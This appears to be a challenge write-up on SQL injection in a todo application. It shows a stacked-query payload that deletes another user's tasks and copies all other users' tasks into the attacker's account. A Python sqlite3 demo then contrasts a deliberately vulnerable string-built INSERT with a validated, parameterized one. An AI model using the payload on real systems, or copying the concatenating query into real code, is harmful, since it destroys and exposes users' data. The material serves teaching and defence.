Exploit: Insert malicious data into the application to destroy other users' data.
Mitigation: Perform server-side validation and parameterize user-supplied data before use.

Payload, submitted as the task description (one string; the line breaks below fall inside the injected task descriptions, and {{user_id}} appears to be a placeholder for the submitting account's own user id):

Say goodbye, user1', 0, '1'); DELETE FROM todo WHERE user_id = '1'; INSERT INTO todo (task_description, task_complete, user_id) VALUES ('All gone
A first task', 0, '{{user_id}}'); INSERT INTO todo (task_description, task_complete, user_id) VALUES ('A second task', 0, '{{user_id}}'); INSERT INTO todo (task_description, task_complete, user_id) VALUES ('A final task
vvvvvStart of other user tasksvvvvv', 0, '{{user_id}}'); INSERT INTO todo (task_description, task_complete, user_id) SELECT task_description, task_complete, '{{user_id}}' FROM todo WHERE user_id != '{{user_id}}'; INSERT INTO todo (task_description, task_complete, user_id) VALUES ('^^^^^End of other user tasks^^^^^
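The mitigation line, as an added example that is not the challenge application's own code: a constructed todo table using the page's column names, a concatenating INSERT under which a shortened form of the page's payload runs as stacked statements, and the validated, parameterized INSERT that stores the same input as plain text. It uses Python's sqlite3; executescript stands in for a database driver that permits stacked queries, and the schema, seed rows and 200-character limit are assumptions.

```python
import sqlite3

# Constructed todo table with the page's column names (example, not the
# challenge application's own schema).
SCHEMA = ("CREATE TABLE todo (id INTEGER PRIMARY KEY, task_description TEXT NOT NULL, "
          "task_complete INTEGER NOT NULL DEFAULT 0, user_id TEXT NOT NULL);")
# Shortened form of the page's payload: closes the quoted literal, deletes
# user 1's rows, then reopens a literal so the app's own closing quote fits.
PAYLOAD = ("Say goodbye, user1', 0, '2'); DELETE FROM todo WHERE user_id = '1'; "
           "INSERT INTO todo (task_description, task_complete, user_id) VALUES ('All gone")

def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany(
        "INSERT INTO todo (task_description, task_complete, user_id) VALUES (?, ?, ?)",
        [("Buy milk", 0, "1"), ("Pay rent", 1, "1"), ("Attacker chores", 0, "2")])
    return conn

def add_task_vulnerable(conn, description, user_id):
    # Splices user input into the SQL text; executescript stands in for a
    # driver that allows stacked statements, so the injected DELETE runs.
    sql = ("INSERT INTO todo (task_description, task_complete, user_id) "
           f"VALUES ('{description}', 0, '{user_id}');")
    conn.executescript(sql)

def add_task_parameterized(conn, description, user_id):
    # Server-side validation plus placeholders: the driver binds description
    # as data, so quotes and semicolons in it never become SQL syntax.
    if not 0 < len(description) <= 200:
        raise ValueError("task_description must be 1-200 characters")
    conn.execute(
        "INSERT INTO todo (task_description, task_complete, user_id) VALUES (?, 0, ?)",
        (description, user_id))
    conn.commit()

def tasks_for(conn, user_id):
    rows = conn.execute(
        "SELECT task_description FROM todo WHERE user_id = ? ORDER BY id", (user_id,))
    return [r[0] for r in rows]

def demo():
    """Returns (user 1 after the unsafe insert, user 1 after the safe one, user 2 after the safe one)."""
    vuln, safe = fresh_db(), fresh_db()
    add_task_vulnerable(vuln, PAYLOAD, "2")
    add_task_parameterized(safe, PAYLOAD, "2")
    return tasks_for(vuln, "1"), tasks_for(safe, "1"), tasks_for(safe, "2")
```

With the concatenated query user 1's rows are gone; with the parameterized one they survive and the whole payload sits in user 2's list as an ordinary task description.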